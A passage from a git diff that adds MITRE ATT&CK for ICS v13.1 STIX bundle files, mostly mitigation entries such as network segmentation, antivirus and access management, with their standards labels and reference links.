"modified": "2023-03-30T20:55:17.252Z", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.3", + "IEC 62443-4-2:2019 - CR 1.3", + "NIST SP 800-53 Rev. 4 - AC-2" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--e57ebc6d-785f-40c8-adb1-b5b5e09b3b48", + "created": "2019-06-06T16:50:58.767Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0918", + "external_id": "M0918" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--f0f5c87a-a58d-440a-b3b5-ca679d98c6dd.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--f0f5c87a-a58d-440a-b3b5-ca679d98c6dd.json new file mode 100644 index 0000000000000000000000000000000000000000..c2f9c0a7c41368ed01c919ad2302b8ae45540c8e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--f0f5c87a-a58d-440a-b3b5-ca679d98c6dd.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--4581dc04-f963-4f04-9364-a3003f174db9", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:15.773Z", + "name": "Redundancy of Service", + "description": "Redundancy could be provided for both critical ICS devices and services, such as back-up devices or hot-standbys.", + "labels": [ + "NIST SP 800-53 Rev. 4 - CP-9" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--f0f5c87a-a58d-440a-b3b5-ca679d98c6dd", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0811", + "external_id": "M0811" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971.json new file mode 100644 index 0000000000000000000000000000000000000000..53f8eba03b893a4579672e0385c5c5e301356fdb --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--9b89d1cd-d9f8-4169-a5b2-c684d5a433ba", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:17.592Z", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "labels": [ + "IEC 62443-3-3:2013 - SR 2.1", + "IEC 62443-4-2:2019 - CR 2.1", + "NIST SP 800-53 Rev. 4 - AC-6" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971", + "created": "2019-06-06T20:54:49.964Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0922", + "external_id": "M0922" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--facb8840-ebe7-49f1-b464-8ef6c8131e21.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--facb8840-ebe7-49f1-b464-8ef6c8131e21.json new file mode 100644 index 0000000000000000000000000000000000000000..6caff733441dada47aabfafffee57b0bcfa08236 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--facb8840-ebe7-49f1-b464-8ef6c8131e21.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--5d32b2c5-c88e-410e-99fe-a19cd2fa461a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:21.915Z", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated with how the software operates.", + "labels": [ + "IEC 62443-3-3:2013 - SR 7.7", + "IEC 62443-4-2:2019 - CR 7.7", + "NIST SP 800-53 Rev. 4 - CM-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--facb8840-ebe7-49f1-b464-8ef6c8131e21", + "created": "2019-07-19T14:40:23.529Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0954", + "external_id": "M0954" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--faf2b40e-5981-433f-aa46-17458e0026f7.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--faf2b40e-5981-433f-aa46-17458e0026f7.json new file mode 100644 index 0000000000000000000000000000000000000000..7210742253ca94d132eaa232286815f1ca89e484 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--faf2b40e-5981-433f-aa46-17458e0026f7.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--ccddb982-78c0-417c-9cde-756e510379b4", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:21.180Z", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software. Within industrial control environments, antivirus/antimalware installations should be limited to assets that are not involved in critical or real-time operations. To minimize the impact to system availability, all products should first be validated within a representative test environment before deployment to production systems. (Citation: NCCIC August 2018)", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.2", + "IEC 62443-4-2:2019 - CR 3.2", + "NIST SP 800-53 Rev. 4 - SI-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--faf2b40e-5981-433f-aa46-17458e0026f7", + "created": "2019-06-11T17:08:33.055Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0949", + "external_id": "M0949" + }, + { + "source_name": "NCCIC August 2018", + "description": "NCCIC 2018, August 2 Recommended Practice: Updating Antivirus in an Industrial Control System Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/Recommended%20Practice%20Updating%20Antivirus%20in%20an%20Industrial%20Control%20System_S508C.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--fce6866f-9a87-4d3e-a73c-f02d8937fe0e.json b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--fce6866f-9a87-4d3e-a73c-f02d8937fe0e.json new file mode 100644 index 0000000000000000000000000000000000000000..4dd376c3849dde9860113a661f93f04b95832b37 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/course-of-action/course-of-action--fce6866f-9a87-4d3e-a73c-f02d8937fe0e.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--1d8249d6-39b2-4406-85c2-44dfc68734f1", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T20:55:14.800Z", + "name": "Minimize Wireless Signal Propagation", + "description": "Wireless signals frequently propagate outside of organizational boundaries, which provide opportunities for adversaries to monitor or gain unauthorized access to the wireless network. (Citation: CISA March 2010) To minimize this threat, organizations should implement measures to detect, understand, and reduce unnecessary RF propagation. (Citation: DHS National Urban Security Technology Laboratory April 2019)", + "labels": [ + "IEC 62443-3-3:2013 - SR 1.6", + "IEC 62443-4-2:2019 - CR 1.6", + "NIST SP 800-53 Rev. 4 - SC-40" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--fce6866f-9a87-4d3e-a73c-f02d8937fe0e", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0806", + "external_id": "M0806" + }, + { + "source_name": "CISA March 2010", + "description": "CISA 2010, March Securing Wireless Networks Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/ncas/tips/ST05-003" + }, + { + "source_name": "DHS National Urban Security Technology Laboratory April 2019", + "description": "DHS National Urban Security Technology Laboratory 2019, April Radio Frequency Detection, Spectrum Analysis, and Direction Finding Equipment Retrieved. 2020/09/17 ", + "url": "https://www.dhs.gov/sites/default/files/saver-msr-rf-detection_cod-508_10july2019.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/ics-attack.json b/cti-ATT-CK-v13.1/ics-attack/ics-attack.json new file mode 100644 index 0000000000000000000000000000000000000000..828e5324d980030ad8967b66463adb89dc56c35f --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/ics-attack.json @@ -0,0 +1,28454 @@ +{ + "type": "bundle", + "id": "bundle--0f187f2a-a62a-4d35-95db-158a5c0d3ec3", + "objects": [ + { + "tactic_refs": [ + "x-mitre-tactic--69da72d2-f550-41c5-ab9e-e8255707f28a", + "x-mitre-tactic--93bf9a8e-b14c-4587-b6d5-9efc7c12eb45", + "x-mitre-tactic--78f1d2ae-a579-44c4-8fc5-3e1775c73fac", + "x-mitre-tactic--33752ae7-f875-4f43-bdb6-d8d02d341046", + "x-mitre-tactic--ddf70682-f3ce-479c-a9a4-7eadf9bfead7", + "x-mitre-tactic--696af733-728e-49d7-8261-75fdc590f453", + "x-mitre-tactic--51c25a9e-8615-40c0-8afd-1da578847924", + "x-mitre-tactic--b2a67b1e-913c-46f6-b219-048a90560bb9", + "x-mitre-tactic--97c8ff73-bd14-4b6c-ac32-3d91d2c41e3f", + "x-mitre-tactic--298fe907-7931-4fd2-8131-2814dd493134", + "x-mitre-tactic--ff048b6c-b872-4218-b68c-3735ebd1f024", + "x-mitre-tactic--77542f83-70d0-40c2-8a9d-ad2eb8b00279" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created": "2018-10-17T00:14:20.652Z", + "description": "The full ATT&CK for ICS Matrix includes techniques spanning various ICS assets and can be used to navigate through the knowledge base.", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "ics-attack", + "url": "https://attack.mitre.org/matrices/ics/" + } + ], + "id": "x-mitre-matrix--575f48f4-8897-4468-897b-48bb364af6c7", + "modified": "2022-05-06T17:47:24.396Z", + "name": "ATT&CK for ICS", + "type": "x-mitre-matrix", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "modified": "2023-03-30T20:55:21.006Z", + "name": "Application Isolation and Sandboxing", + "description": "Restrict the execution of code to a virtual environment on or in-transit to an endpoint system.", + "labels": [ + "IEC 62443-3-3:2013 - SR 5.4", + "IEC 62443-4-2:2019 - CR 5.4", + "NIST SP 800-53 Rev. 4 - SI-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--059ba11e-e3dc-49aa-84ca-88197f40d4ea", + "created": "2019-06-11T17:06:56.230Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0948", + "external_id": "M0948" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:19.604Z", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic. Perform inline allow/denylisting of network messages based on the application layer (OSI Layer 7) protocol, especially for automation protocols. Application allowlists are beneficial when there are well-defined communication sequences, types, rates, or patterns needed during expected system operations. Application denylists may be needed if all acceptable communication sequences cannot be defined, but instead a set of known malicious uses can be denied (e.g., excessive communication attempts, shutdown messages, invalid commands). Devices performing these functions are often referred to as deep-packet inspection (DPI) firewalls, context-aware firewalls, or firewalls blocking specific automation/SCADA protocol aware firewalls. (Citation: Centre for the Protection of National Infrastructure February 2005)", + "labels": [ + "IEC 62443-3-3:2013 - SR 5.1", + "IEC 62443-4-2:2019 - CR 5.1", + "NIST SP 800-53 Rev. 4 - AC-3; SC-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "created": "2019-06-11T16:33:55.337Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0937", + "external_id": "M0937" + }, + { + "source_name": "Centre for the Protection of National Infrastructure February 2005", + "description": "Centre for the Protection of National Infrastructure 2005, February FIREWALL DEPLOYMENT FOR SCADA AND PROCESS CONTROL NETWORKS Retrieved. 2020/09/17 ", + "url": "https://www.energy.gov/sites/prod/files/Good%20Practices%20Guide%20for%20Firewall%20Deployment.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:17.426Z", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "labels": [ + "IEC 62443-3-3:2013 - SR 2.4", + "IEC 62443-4-2:2019 - HDR 2.4", + "NIST SP 800-53 Rev. 4 - SC-18" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--143b4398-3222-480a-b6a4-e131bc2d3144", + "created": "2019-06-06T20:52:59.206Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0921", + "external_id": "M0921" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-31T19:16:54.636Z", + "name": "Validate Program Inputs", + "description": "Devices and programs designed to interact with control system parameters should validate the format and content of all user inputs and actions to ensure the values are within intended operational ranges. These values should be evaluated and further enforced through the program logic running on the field controller. If a problematic or invalid input is identified, the programs should either utilize a predetermined safe value or enter a known safe state, while also logging or alerting on the event.(Citation: PLCTop20 Mar 2023)", + "labels": [ + "NIST SP 800-53 Rev. 4 - SI-10", + "IEC 62443-3-3:2013 - SR 3.5", + "IEC 62443-3-3:2013 - SR 3.6", + "IEC 62443-4-2:2019 - CR 3.5", + "IEC 62443-4-2:2019 - CR 3.6" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "type": "course-of-action", + "id": "course-of-action--1cbcceef-3233-4062-aa86-ec91afe39517", + "created": "2023-03-22T15:49:55.439Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0818", + "external_id": "M0818" + }, + { + "source_name": "PLCTop20 Mar 2023", + "description": "PLC Security, Top 20 Community. (2021, June 15). Secure PLC Coding Practices: Top 20 version 1.0. Retrieved March 22, 2023.", + "url": "https://plc-security.com/content/Top_20_Secure_PLC_Coding_Practices_V1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-30T20:55:18.480Z", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Restrict network access to only required systems and services. In addition, prevent systems from other networks or business functions (e.g., enterprise) from accessing critical process control systems. For example, in IEC 62443, systems within the same secure level should be grouped into a zone, and access to that zone is restricted by a conduit, or mechanism to restrict data flows between zones by segmenting the network. (Citation: IEC February 2019) (Citation: IEC August 2013)", + "labels": [ + "IEC 62443-3-3:2013 - SR 5.1", + "IEC 62443-4-2:2019 - CR 5.1", + "NIST SP 800-53 Rev. 4 - AC-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "created": "2019-06-10T20:41:03.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0930", + "external_id": "M0930" + }, + { + "source_name": "IEC February 2019", + "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 2020/09/25 ", + "url": "https://webstore.iec.ch/publication/34421" + }, + { + "source_name": "IEC August 2013", + "description": "IEC 2013, August Industrial communication networks - Network and system security - Part 3-3: System security requirements and security levels Retrieved. 2020/09/25 ", + "url": "https://webstore.iec.ch/publication/7033" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-11T20:51:32.610Z", + "name": "Restrict Library Loading", + "description": "Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.", + "labels": [ + "IEC 62443-3-3:2013 - SR 7.7", + "IEC 62443-4-2:2019 - CR 7.7", + "NIST SP 800-53 Rev. 4 - CM-7" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "type": "course-of-action", + "id": "course-of-action--2ab9fc6d-3cf6-4d7b-85f1-3ad6949233b3", + "created": "2019-06-11T17:00:01.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0944", + "external_id": "M0944" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Active Directory Configuration", + "description": "Configure Active Directory to prevent use of certain techniques; use security identifier (SID) Filtering, etc.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--2f0160b7-e982-49d7-9612-f19b810f1722", + "created": "2019-06-06T16:39:58.291Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0915", + "external_id": "M0915" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:18.665Z", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries. In industrial control environments, network intrusion prevention should be configured so it will not disrupt protocols and communications responsible for real-time functions related to control or safety.", + "labels": [ + "IEC 62443-3-3:2013 - SR 6.2", + "IEC 62443-4-2:2019 - CR 6.2", + "NIST SP 800-53 Rev. 4 - SI-4" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--3172222b-4983-43f7-8983-753ded4f13bc", + "created": "2019-06-10T20:46:02.263Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0931", + "external_id": "M0931" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:17.759Z", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "labels": [ + "IEC 62443-3-3:2013 - SR 2.1", + "IEC 62443-4-2:2019 - CR 2.1", + "NIST SP 800-53 Rev. 4 - AC-6" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--3222a807-521b-4a1a-aa13-f1cda45734b3", + "created": "2019-06-06T20:58:59.577Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0924", + "external_id": "M0924" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:14.442Z", + "name": "Data Loss Prevention", + "description": "Data Loss Prevention (DLP) technologies can be used to help identify adversarial attempts to exfiltrate operational information, such as engineering plans, trade secrets, recipes, intellectual property, or process telemetry. DLP functionality may be built into other security products such as firewalls or standalone suites running on the network and host-based agents. DLP may be configured to prevent the transfer of information through corporate resources such as email, web, and physical media such as USB for host-based solutions.", + "labels": [ + "IEC 62443-3-3:2013 - SR 4.1", + "IEC 62443-4-2:2019 - CR 4.1" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--337c4e2a-21a7-4d9a-bfee-9efd6cebf0e5", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0803", + "external_id": "M0803" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:14.081Z", + "name": "Access Management", + "description": "Access Management technologies can be used to enforce authorization polices and decisions, especially when existing field devices do not provided sufficient capabilities to support user identification and authentication. (Citation: McCarthy, J et al. July 2018) These technologies typically utilize an in-line network device or gateway system to prevent access to unauthenticated users, while also integrating with an authentication service to first verify user credentials. (Citation: Centre for the Protection of National Infrastructure November 2010)", + "labels": [ + "IEC 62443-3-3:2013 - SR 2.1", + "IEC 62443-4-2:2019 - CR 2.1", + "NIST SP 800-53 Rev. 4 - AC-3" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0801", + "external_id": "M0801" + }, + { + "source_name": "McCarthy, J et al. July 2018", + "description": "McCarthy, J et al. 2018, July NIST SP 1800-2 Identity and Access Management for Electric Utilities Retrieved. 2020/09/17 ", + "url": "https://doi.org/10.6028/NIST.SP.1800-2" + }, + { + "source_name": "Centre for the Protection of National Infrastructure November 2010", + "description": "Centre for the Protection of National Infrastructure 2010, November Configuring and Managing Remote Access for Industrial Control Systems Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/RP_Managing_Remote_Access_S508NC.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Mitigation Limited or Not Effective", + "description": "This type of attack technique cannot be easily mitigated with preventative controls since it is based on the abuse of system features.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433", + "created": "2020-09-11T16:32:21.854Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0816", + "external_id": "M0816" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:21.352Z", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "labels": [ + "IEC 62443-3-3:2013 - SR 3.2", + "IEC 62443-4-2:2019 - CR 3.2", + "NIST SP 800-53 Rev. 4 - SI-16" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": "course-of-action--49363b74-d506-4342-bd63-320586ebadb9", + "created": "2019-06-11T17:10:57.070Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M0950", + "external_id": "M0950" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:55:19.179Z", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "labels": [ + "IEC 62443-3-3:2013 - SR 5.1", + "IEC 62443-4-2:2019 - CR 5.1", + "NIST SP 800-53 Rev. 4 - AC-3; SC-7" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "course-of-action", + "id": 